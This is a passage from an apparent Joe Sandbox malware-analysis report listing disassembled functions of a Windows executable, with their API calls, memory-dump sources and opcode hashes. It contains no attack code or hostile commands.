                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: cc8fab3c86f7d6fe0b03a4b9e3a11541b4bca2b64503b20e80c6e1f24e71eafb
                                                                                        • Instruction ID: 72bd16fb82975544af8c200d7e572f97766f133fc792a3576f8000f7f465e5f5
                                                                                        • Opcode Fuzzy Hash: cc8fab3c86f7d6fe0b03a4b9e3a11541b4bca2b64503b20e80c6e1f24e71eafb
                                                                                        • Instruction Fuzzy Hash: 38D18762F0C68155EB68CB2695402BD7FA1FBA5B84F0C0135EA7D877E5EF38E6618700
                                                                                        Function 00007FF6FE195294 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1017591355-0
                                                                                        • Opcode ID: a143f18b4ccf410723d5b55495dd87be6177e3dd9b35435d6782b563dee17ef9
                                                                                        • Instruction ID: f6d0b539cda47bf0b430e054db9522837dc780314a4c204608661898f1e7a915
                                                                                        • Opcode Fuzzy Hash: a143f18b4ccf410723d5b55495dd87be6177e3dd9b35435d6782b563dee17ef9
                                                                                        • Instruction Fuzzy Hash: CC61DC11E0C24781FBA4DA27941427E6A91AFE5BD0F144131FE6EA7ACEFE6CE5448221
                                                                                        Function 00007FF6FE1A1870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE19E948: ReleaseSemaphore.KERNEL32 ref: 00007FF6FE19E974
                                                                                          • Part of subcall function 00007FF6FE19E948: CloseHandle.KERNELBASE ref: 00007FF6FE19E993
                                                                                          • Part of subcall function 00007FF6FE19E948: DeleteCriticalSection.KERNEL32 ref: 00007FF6FE19E9AA
                                                                                          • Part of subcall function 00007FF6FE19E948: CloseHandle.KERNEL32 ref: 00007FF6FE19E9B7
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE1A1ACB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 904680172-0
                                                                                        • Opcode ID: 83a8608da7dc23804aca21668a1faaf692e5e9dd69844c9f3465cc8d5fef8d50
                                                                                        • Instruction ID: 8e79a7ac4c4ea5472b45828d2c7b11d8f3686df96a037a3de82886c0f20d7774
                                                                                        • Opcode Fuzzy Hash: 83a8608da7dc23804aca21668a1faaf692e5e9dd69844c9f3465cc8d5fef8d50
                                                                                        • Instruction Fuzzy Hash: 79618CA2F15A85A2EF08DB66D5540BC6765FB90F90B544232F73E87AC5EF28E464C300
                                                                                        Function 00007FF6FE18EC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: d3e9fa35f1103ad580ad4f8a12127b3ececafcbd4c14c285a9c87c65cd680fd4
                                                                                        • Instruction ID: ecd1544252dc06bc228a0f0b019626ecf20a8681ad0584893861540caaa0d4d7
                                                                                        • Opcode Fuzzy Hash: d3e9fa35f1103ad580ad4f8a12127b3ececafcbd4c14c285a9c87c65cd680fd4
                                                                                        • Instruction Fuzzy Hash: 8B518062E0C64250EB14DB2798443AE2F51ABE5BD4F440236FE6D877D6EE3DE585C300
                                                                                        Function 00007FF6FE18E7A8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE193EC8: FindClose.KERNEL32(?,?,00000000,00007FF6FE1A0811), ref: 00007FF6FE193EFD
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE18E993
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1011579015-0
                                                                                        • Opcode ID: 864680af9fc0f386fe5511f3b68e5025b57726e97162e4a7d041eb2bb48d23ec
                                                                                        • Instruction ID: 86d3583b6cc7ea8383ce56e135840cd54a31be931c82bf41bc4e353e29386dce
                                                                                        • Opcode Fuzzy Hash: 864680af9fc0f386fe5511f3b68e5025b57726e97162e4a7d041eb2bb48d23ec
                                                                                        • Instruction Fuzzy Hash: 30515F22E0C68681FB60DF26984536E2B51FBE5B84F440136FA6D876E9EE3CE581C700
                                                                                        Function 00007FF6FE191794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: d4710ee1c17745c4e2fb2185b683256d00337611548b7710b9c1317264979094
                                                                                        • Instruction ID: ba55c4c96161a2cf6b0d1e909c91c50e006d67e459fceccf1616a4e448893212
                                                                                        • Opcode Fuzzy Hash: d4710ee1c17745c4e2fb2185b683256d00337611548b7710b9c1317264979094
                                                                                        • Instruction Fuzzy Hash: 6F41A262F18A8142FB14DA17A64036EAA51BB94BC0F448536EE6D87F9EEF7CD5918300
                                                                                        Function 00007FF6FE192F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: f5994b23863df56f13e19732c7b5392fac300bbdca5fd5cc38b58261a4c2634e
                                                                                        • Instruction ID: 2219215de757ba4a32e055dcbc60a3cbedb36b5c9da5d30a24e8a6fb0bab55c1
                                                                                        • Opcode Fuzzy Hash: f5994b23863df56f13e19732c7b5392fac300bbdca5fd5cc38b58261a4c2634e
                                                                                        • Instruction Fuzzy Hash: 9541B062E08A0180EB14DB26E54537D2B61EBE5BD8F181235FA6D877DDEE3DE441C600
                                                                                        Function 00007FF6FE1BBDF8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                        • String ID:
                                                                                        • API String ID: 3947729631-0
                                                                                        • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                        • Instruction ID: 752b928dd75737378aac5a64a955e184168eccd9497a1d237cc21881a5b3d012
                                                                                        • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                        • Instruction Fuzzy Hash: C7416F21E19A5282EB64DF1698905B82A51BFF4B40F44443AFA2ED7BE1EE7DF841C740
                                                                                        Function 00007FF6FE18129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                        • String ID:
                                                                                        • API String ID: 680105476-0
                                                                                        • Opcode ID: 6f88c17e658a7e6a764477403b9247f1d27f5880b65831beeeee99c6ba04093e
                                                                                        • Instruction ID: 5ed2984f8543deed216d5e1d5c37ec3a77ced97e803de35dcd005b0a7507edf4
                                                                                        • Opcode Fuzzy Hash: 6f88c17e658a7e6a764477403b9247f1d27f5880b65831beeeee99c6ba04093e
                                                                                        • Instruction Fuzzy Hash: 56218D22F0C65185FB14DA52A4402B96B54ABA5BF0F680B32EE3D87BC1EE7CE2518300
                                                                                        Function 00007FF6FE1C124C Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                        • Instruction ID: 22e57061fa78715b36bb9191c2987db8c7de1e0979a7377f8621116598215d56
                                                                                        • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                        • Instruction Fuzzy Hash: 54113A26F5C64286F710DB56A4405B96AA4FBE4380F640536FAADD6BD5EF2CE840C700
                                                                                        Function 00007FF6FE1AFC68 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: GetDlgItem.USER32 ref: 00007FF6FE1AF0E3
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: ShowWindow.USER32 ref: 00007FF6FE1AF109
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF11E
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF136
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF157
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF173
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF1B6
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF1D4
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF1E8
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF212
                                                                                          • Part of subcall function 00007FF6FE1AF0A4: SendMessageW.USER32 ref: 00007FF6FE1AF22A
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6FE1AFD03
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1587882848-0
                                                                                        • Opcode ID: cda69570bdac1a94ff29650853fe264a00bf8ba2677d701060c4dce7484e7aab
                                                                                        • Instruction ID: 81b2596e0b9080cba4652a4cc2e9ad0c78b4dce7899b6a7f9adfeca9612187ad
                                                                                        • Opcode Fuzzy Hash: cda69570bdac1a94ff29650853fe264a00bf8ba2677d701060c4dce7484e7aab
                                                                                        • Instruction Fuzzy Hash: 7801A562E5868541EB20D726D44537E6712EFEDB94F500331FABD867DAFE2CE144C604
                                                                                        Function 00007FF6FE183AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: d36793c31387f104dd38dd6a9dfed600e2c4ae88e6f2c17daf49c6767410ecdf
                                                                                        • Instruction ID: a05514572d86883f5e912276deb7ce7ccb49ca896569e227c87848d82219a9c7
                                                                                        • Opcode Fuzzy Hash: d36793c31387f104dd38dd6a9dfed600e2c4ae88e6f2c17daf49c6767410ecdf
                                                                                        • Instruction Fuzzy Hash: 9D01A1A2E1CA8541EB21DB2AE4412697761FBE9790F445231FAAC47BE5EE2CE1408604
                                                                                        Function 00007FF6FE1B1558 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE1B1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF6FE1B1573,?,?,?,00007FF6FE1B192A), ref: 00007FF6FE1B162B
                                                                                        • DloadProtectSection.DELAYIMP ref: 00007FF6FE1B15C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: DloadHandleModuleProtectSection
                                                                                        • String ID:
                                                                                        • API String ID: 2883838935-0
                                                                                        • Opcode ID: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                        • Instruction ID: bd02f3e2f396c35acfd09909f3545fe57740a75d13b478a3c3e9f4bafe47096a
                                                                                        • Opcode Fuzzy Hash: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                        • Instruction Fuzzy Hash: 0111ACE1F08A0681FB60DB4BA8843B11B51AFB5348F190435F92EC67E1FE7CB8958600
                                                                                        Function 00007FF6FE193EC8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF6FE1940BC: FindFirstFileW.KERNELBASE ref: 00007FF6FE19410B
                                                                                          • Part of subcall function 00007FF6FE1940BC: FindFirstFileW.KERNELBASE ref: 00007FF6FE19415E
                                                                                          • Part of subcall function 00007FF6FE1940BC: GetLastError.KERNEL32 ref: 00007FF6FE1941AF
                                                                                        • FindClose.KERNEL32(?,?,00000000,00007FF6FE1A0811), ref: 00007FF6FE193EFD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1464966427-0
                                                                                        • Opcode ID: b8896e383a5d1dcda19e37a11711c970bf4128f41c8ad41a5c5cc42cc5e45b14
                                                                                        • Instruction ID: 87d6e5124c5807a7d2c1b03b19d69f8d7d9735b393d6453bee00bad99e5fc20a
                                                                                        • Opcode Fuzzy Hash: b8896e383a5d1dcda19e37a11711c970bf4128f41c8ad41a5c5cc42cc5e45b14
                                                                                        • Instruction Fuzzy Hash: 55F0A462D0824185DB10EF76A1401BD3B609FA5BB4F181335FA3D472CBDE28D454C745
                                                                                        Function 00007FF6FE19273C Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File
                                                                                        • String ID:
                                                                                        • API String ID: 749574446-0
                                                                                        • Opcode ID: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
